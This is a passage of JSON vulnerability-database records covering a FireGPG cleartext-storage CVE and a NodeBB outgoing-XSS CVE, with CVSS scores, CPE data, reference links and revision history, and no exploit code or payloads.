"9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", 